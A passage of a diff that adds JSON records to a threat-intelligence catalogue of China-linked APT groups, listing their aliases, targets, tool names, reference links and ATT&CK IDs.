espionage purposes." + ], + "operations": [], + "description": null, + "tools": [ + "NetTraveler" + ], + "links": [ + "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", + "https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/", + "https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Ice Fog", + "ICEFOG", + "Fucobha, Temp.Trident", + "IceFog", + "Dagger Panda" + ], + "targets": [ + "This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in US, Taiwan, Japan and South Korea." + ], + "operations": [], + "description": null, + "tools": [ + "RoyalRoad RTF Weaponizer", + "Dagger Three (C2 software)", + "Fucobha Backdoor", + "IceFog" + ], + "links": [ + "https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/icefog.pdf", + "http://www.darkreading.com/attacks-and-breaches/java-icefog-malware-variant-infects-us-businesses/d/d-id/1113451", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Beijing Group", + "Sneaky Panda", + "Hydraq, SIG22, Elderwood, Elderwood Gang" + ], + "targets": [ + "This threat actor targets private sector companies in the defense, shipping, aeronautics, arms, and energy sectors, as well as nonprofits and financial firms." + ], + "operations": [], + "description": null, + "tools": [ + "Hydraq", + "Elderwood Project" + ], + "links": [ + "http://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "https://en.wikipedia.org/wiki/Operation_Aurora#Attackers_involved" + ], + "attck_id": "G0066", + "comment": "Possibly assisted in Operation Aurora, the RSA incident, and the Joint Strike Fighter Program compromise" + }, + { + "country": "china", + "names": [ + "Barista", + "BRONZE OLIVE", + "Wet Panda", + "APT22" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "FLATNOTE", + "SOGU", + "ANGRYBELL", + "SEAWOLF", + "LOGJAM", + "BASELESS", + "China Chopper", + "PISCES" + ], + "links": [ + "http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild" + ], + "attck_id": null, + "comment": "Possible overlap with Beijing Group" + }, + { + "country": "china", + "names": [ + "Suckfly" + ], + "targets": [ + "Indian organisations and Republic of Korea" + ], + "operations": [], + "description": null, + "tools": [ + "Korplug", + "PlugX", + "Nidiran" + ], + "links": [ + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" + ], + "attck_id": "G0039", + "comment": null + }, + { + "country": "china", + "names": [ + "PLA Navy", + "Wisp Team", + "Samurai Panda", + "Sykipot", + "APT4" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.crowdstrike.com/blog/whois-samurai-panda/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Pitty Panda", + "Pitty Tiger" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "PittyTiger", + "Paladin RAT" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html", + "http://blog.malwaretracker.com/2013/06/tomato-garden-campaign-possible.html", + "http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2" + ], + "attck_id": null, + "comment": "\"Pitty Tiger\" was originally the name of a malware payload by the malware tracker blog. Airbus and FireEye identified the actor as Chinese. CrowdStrike uses \"tiger\" when naming adversaries alligned with India. Crowdstrike associates the actor with the name \"Pitty Panda\" conforming to their naming convention for Chinese actors." + }, + { + "country": "china", + "names": [ + "Scarlet Mimic" + ], + "targets": [ + "Uyghur and Tibetan activists as well as those who are interested in their causes" + ], + "operations": [], + "description": null, + "tools": [ + "FakeM", + "Psylo", + "MobileOrder" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ], + "attck_id": "G0029", + "comment": null + }, + { + "country": "china", + "names": [ + "Sunshop Group", + "C0d0so", + "Codoso", + "APT19" + ], + "targets": [ + "Forbes, Defense, Finance, Energy, Government, Political Dissidents, Global Think Tanks" + ], + "operations": [], + "description": "Watering Hole", + "tools": [ + "Derusbi", + "Bergard Trojan", + "TXER" + ], + "links": [ + "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks", + "https://www.proofpoint.com/us/threat-insight/post/exploring-bergard-old-malware-new-tricks", + "http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "http://www.isightpartners.com/2015/02/codoso/#sthash.VJMDVPQB.dpuf", + "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/" + ], + "attck_id": "G0073", + "comment": null + }, + { + "country": "china", + "names": [ + "SVCMONDR" + ], + "targets": [ + "Taiwan, Thailand" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545" + ], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Wisp Team", + "APT4" + ], + "targets": [ + "Defense Industrial Base, US Government" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2014/09/weeks-threatscape-media-highlights-update-22/", + "https://www.isightpartners.com/2015/01/threatscape-media-highlights-update-week-january-12/", + "https://www.isightpartners.com/2014/04/weeks-threatscape-media-highlights-update-2/" + ], + "attck_id": null, + "comment": "iSight has mentioned tracking a China-nexus group they dub \"Wisp Team\" - have not resolved this w/ other naming conventions" + }, + { + "country": "china", + "names": [ + "Mana Team" + ], + "targets": [ + "Australia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/" + ], + "attck_id": null, + "comment": "iSight has mentioned tracking a China-nexus activity they dub \"Mana Team\", targeting Australian interests - have not resolved this w/ other naming conventions" + }, + { + "country": "china", + "names": [ + "TEMP.Zhenbao" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2014/11/threatscape-media-highlights-update-week-november-10/", + "http://www.securityweek.com/plugx-rat-used-gather-intel-afghan-russian-military-report" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "SPIVY" + ], + "targets": [ + "Hong Kong dissidents" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Mofang", + "Whitefly", + "BRONZE WALKER" + ], + "targets": [ + "Government, military, Critical Infrastructure,Automotive Industry*,Weapon Industry*, This threat actor compromises government and critical infrastructure entities, primarily in Myanmar, for espionage purposes. Myanmar, Canada, United States, Germany, India, South Korea, Singapore" + ], + "operations": [], + "description": null, + "tools": [ + "ShimRATReporter", + "ShimRAT" + ], + "links": [ + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore", + "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/", + "https://www.threatconnect.com/china-superman-apt/" + ], + "attck_id": "SingHealth", + "comment": null + }, + { + "country": "china", + "names": [ + "Dragon Castling", + "DragonOK" + ], + "targets": [ + "Japan, SE Asia casino & gaming" + ], + "operations": [], + "description": null, + "tools": [ + "IsSpace", + "CVE-2015-1641", + "Rambo Backdoor", + "Sysget" + ], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor", + "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/", + "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ], + "attck_id": "G0017", + "comment": null + }, + { + "country": "china", + "names": [ + "Group 27" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "3102 variant of 9002 RAT", + "EvilGrab", + "Trochilus RAT", + "PlugX" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Pointed-Dagger.pdf", + "https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "CactusPete", + "Tonto Team" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "RoyalRoad RTF Weaponizer" + ], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403?emailToken=JRrydPtyYnqTg9EyZsw31FwuZ7JNEOKCXF7LaW/HM1DLsjnUp6e6wLgph560pnmiTAN/5ssf7moyADPQj2p2Gc+YkL1yi0zhIiUM9M6aj1HTYQ==", + "https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector", + "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "TA459" + ], + "targets": [ + "Central Asian countries, Russia, Belarus, Mongolia, and others" + ], + "operations": [], + "description": null, + "tools": [ + "PCrat", + "RoyalRoad RTF Weaponizer", + "PlugX", + "ZeroT", + "Gh0st", + "NetTraveler" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts#.WS3IBVFV4no.twitter" + ], + "attck_id": "G0062", + "comment": null + }, + { + "country": "china", + "names": [ + "BRONZE BUTLER", + "REDBALDKNIGHT", + "Tick" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "avirra Downloader", + "PsExec", + "Daserf", + "Datper", + "procdump", + "RoyalRoad RTF Weaponizer", + "WCE", + "ABK Downloader", + "whoami", + "Gofarer", + "gsecdump", + "VBS" + ], + "links": [ + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", + "https://therecord.media/japanese-police-say-tick-apt-is-linked-to-chinese-military/", + "https://www.secureworks.jp/resources/rp-bronze-butler", + "https://blog.talosintelligence.com/2018/10/tracking-tick-through-recent-campaigns.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + ], + "attck_id": "G0060", + "comment": null + }, + { + "country": "china", + "names": [ + "Lucky Cat", + "Shadow Network, SabPub, TA413 (Proofpoint)" + ], + "targets": [ + "A threat actor targets computer networks associated with Tibetan activists, as well as military research and development, aerospace, engineering, and shipping industries in India and Japan." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/luckycat-redux-inside-an-apt-campaign/", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_luckycat_hackers.pdf", + "http://www.securityweek.com/mac-malware-linked-luckycat-attack-campaign", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html", + "http://www.infoworld.com/article/2617225/malware/sabpub-malware-proves-macs-are-an-apt-target.html", + "https://securelist.com/blog/incidents/33208/new-version-of-osx-sabpub-confirmed-mac-apt-attacks-19/", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic", + "http://www.nartv.org/mirror/shadows-in-the-cloud.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Leviathan", + "Temp.Jumper, GADOLINIUM, MUDCARP, Hainan Xiandun Technology Company", + "Temp.Periscope", + "APT40" + ], + "targets": [ + "maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities" + ], + "operations": [], + "description": null, + "tools": [ + "MURKYTOP", + "BADFLICK", + "LUNCHMONEY", + "Derusbi", + "CVE-2017-11882", + "AIRBREAK", + "RoyalRoad RTF Weaponizer", + "BLACKCOFFEE", + "China Chopper", + "PHOTO", + "HOMEFRY", + "Beacon" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", + "https://lab52.io/blog/leviathan-geostrategy-and-ttp-technical-tactics-and-procedures/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network/", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding/", + "https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40/", + "https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company/" + ], + "attck_id": "G0065", + "comment": null + }, + { + "country": "china", + "names": [ + "TG-3279", + "Winnti Umbrella, China Cracking Group, ", + "PassCV" + ], + "targets": [ + "Gaming Companies" + ], + "operations": [], + "description": null, + "tools": [ + "NetCommander", + "Sabre", + "Kitkiot", + "icmp_shell", + "Etso", + "Runxx", + "rdp_crk", + "s (custom port scanner)", + "Carberp RAT", + "Conpee", + "Jynxkit", + "dnsenum", + "Gh0st RAT" + ], + "links": [ + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies", + "https://401trg.com/burning-umbrella/", + "https://www.secureworks.com/research/threat-group-3279-targets-the-video-game-industry#up2" + ], + "attck_id": null, + "comment": "Personas: Laurentiu Moon, Sincoder" + }, + { + "country": "china", + "names": [ + "BARIUM", + "Winnti Umbrella, BRONZE ATLAS", + "TG-2633" + ], + "targets": [ + "Electronic gaming, multimedia, Internet content industries, technology companies" + ], + "operations": [], + "description": null, + "tools": [ + "Winnti Rootkit malware" + ], + "links": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/?source=mmpc", + "https://401trg.pw/burning-umbrella/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "LEAD", + "Winnti Umbrella" + ], + "targets": [ + "Multinational, multi-industry companies, textiles, chemicals, electronics, pharmaceutical companies, manufacturing" + ], + "operations": [], + "description": null, + "tools": [ + "Winnti Rootkit malware" + ], + "links": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/?source=mmpc", + "https://www.france24.com/en/20190404-bayer-victim-cyber-attack-german-media", + "https://401trg.pw/burning-umbrella/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Rocke", + "Iron Group" + ], + "targets": [ + "Cybercrime, Cryptomining, Cryptojacking" + ], + "operations": [], + "description": null, + "tools": [ + "XBash" + ], + "links": [ + "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/", + "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang#When:18:10:00Z", + "https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Anchor Panda" + ], + "targets": [ + "This threat actor targets government and private sector entities interested in maritime issues in the South China Sea for espionage purposes. Maritime satellite systems, aerospace companies, and defense contractors." + ], + "operations": [], + "description": null, + "tools": [ + "Torn RAT", + "Poison Ivy", + "Adobe Gh0st" + ], + "links": [ + "http://www.crowdstrike.com/blog/whois-anchor-panda/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Aquatic Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Big Panda" + ], + "targets": [ + "Financial services firms" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?" + ], + "attck_id": null, + "comment": "Mentioned by Alperovitch in 2013 article as targeting financial services industry" + }, + { + "country": "china", + "names": [ + "Electric Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "attck_id": null, + "comment": "Listed on slide 8" + }, + { + "country": "china", + "names": [ + "Eloquent Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Mentioned slide 15" + }, + { + "country": "china", + "names": [ + "TG-3390", + "Emissary Panda", + "BRONZE UNION", + "TEMP.Hippo", + "LuckyMouse", + "APT27", + "ZipToken, Iron Tiger" + ], + "targets": [ + "US Gov and contractors, Western think tanks" + ], + "operations": [ + "A Tale of Two Targets\t" + ], + "description": null, + "tools": [ + "Hunter", + "nbtscan", + "China Chopper Webshell", + "htran", + "PlugX", + "HttpBrowser", + "wce", + "ASPXTool", + "gsecdump" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://blog.group-ib.com/task", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.secureworks.com/research/bronze-union", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://securelist.com/luckymouse-ndisproxy-driver/87914/", + "http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states" + ], + "attck_id": "G0027", + "comment": null + }, + { + "country": "china", + "names": [ + "Foxy Panda" + ], + "targets": [ + "Technology & Communications" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Gibberish Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "attck_id": null, + "comment": "Listed slide 8" + }, + { + "country": "china", + "names": [ + "Cycldek", + "Cycldek, Conimes Team, China1937CN Team, Temp.Conimes", + "Goblin Panda", + "Hellsing" + ], + "targets": [ + "Southeast Asia, Government of Vietnam" + ], + "operations": [], + "description": null, + "tools": [ + "Sisfader", + "BlueCore", + "ZeGhost", + "PlugX", + "RoyalRoad RTF Weaponizer", + "NewCore RAT", + "tempfun", + "RedCore" + ], + "links": [ + "https://www.fortinet.com/blog/threat-research/cta-security-playbook--goblin-panda.html", + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/", + "https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/" + ], + "attck_id": null, + "comment": "Weaponizer leaked, new activity wrongly attributed to this long inactive group, possible links to Icefog/Dagger Panda and Temp.Periscope/APT40" + }, + { + "country": "china", + "names": [ + "Hammer Panda" + ], + "targets": [ + "Russia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Zirconium", + "BRONZE VINEWOOD", + "Hurricane Panda", + "Black Vine", + "APT31", + "TEMP.Avengers" + ], + "targets": [ + "Aerospace, Healthcare, Energy (gas & electric turbine manufacturing), Military and defense, Finance, Agriculture, Technology, Japan, United States, United Kingdom, India, Canada, Brazil, South Africa, Australia, Thailand, South Korea, France, Switzerland, Sweden, Finland, Norway" + ], + "operations": [ + "Op. Poisoned Hurricane" + ], + "description": null, + "tools": [ + "Mimikatz", + "China Chopper Webshell", + "PlugX", + "Sakula" + ], + "links": [ + "https://raw.githubusercontent.com/GuardaCyber/APT-Groups-and-Operations/master/Reports/FireEye%20Intel%20-%20APT31%20Threat%20Group%20Profile.pdf", + "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", + "https://blog.confiant.com/uncovering-2017s-largest-malvertising-operation-b84cd38d6b85", + "https://uk.reuters.com/article/uk-china-cyber-norway-visma/china-hacked-norways-visma-to-steal-client-secrets-investigators-idUKKCN1PV14R", + "http://blog.airbuscybersecurity.com/post/2015/10/Malware-Sakula-Evolutions-%28Part-2/2%29", + "https://www.symantec.com/connect/blogs/black-vine-formidable-cyberespionage-group-targeted-aerospace-healthcare-2012", + "http://blog.airbuscybersecurity.com/post/2015/09/APT-BlackVine-Malware-Sakula", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003/", + "https://research.checkpoint.com/2021/the-story-of-jian/", + "https://therecord.media/norway-says-chinese-group-apt31-is-behind-catastrophic-2018-government-hack/", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", + "http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/", + "http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/" + ], + "attck_id": null, + "comment": "used free DNS servers provided by Hurricane Electric" + }, + { + "country": "china", + "names": [ + "Impersonating Panda" + ], + "targets": [ + "Financial sector" + ], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Judgement Panda" + ], + "targets": [ + "Upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets" + ], + "operations": [], + "description": null, + "tools": [ + "Spear-phishing", + "URL \u00e2\u0080\u009cweb bugs\u00e2\u0080\u009d and scheduled tasks to automate credential harvesting" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "CactusPete", + "Bisonal (malware), Lone Ranger", + "Karma Panda", + "Tonto Team" + ], + "targets": [ + "Dissident groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf", + "https://securelist.com/apt-trends-report-q1-2019/90643/" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "temp.bottle", + "Keyhole Panda", + "Bronze Fleetwood " + ], + "targets": [ + "Electronics & Communications" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Kryptonite Panda" + ], + "targets": [ + "Cambodia" + ], + "operations": [], + "description": null, + "tools": [ + "8.t exploit document builder" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Mustang Panda", + "Temp.Hex", + "HoneyMyte", + "BRONZE PRESIDENT", + "TA416, RedDelta" + ], + "targets": [ + "Mining sector in Mongolia, private individuals |=| gathering geo-political and economic intelligence, NGOs, political & law enforcement org in South and East Asia" + ], + "operations": [], + "description": null, + "tools": [ + "ORat", + "Nmap", + "RCSession", + "Wmiexec", + "Nbtscan", + "PlugX", + "China Chopper web shell", + "Cobalt Strike" + ], + "links": [ + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z", + "https://kc.mcafee.com/corporate/index?page=content&id=KB92635&locale=en_US", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://securelist.com/apt-trends-report-q3-2019/94530/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-dianxun-cyberespionage-campaign-targeting-telecommunication-companies/", + "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf " + ], + "attck_id": "G0129", + "comment": null + }, + { + "country": "china", + "names": [ + "Night Dragon" + ], + "targets": [ + "A threat actor compromised U.S. oil companies through spear phishing and remote administration tools. Oil, Energy and Petrochemical (OpNightDragon)" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf", + 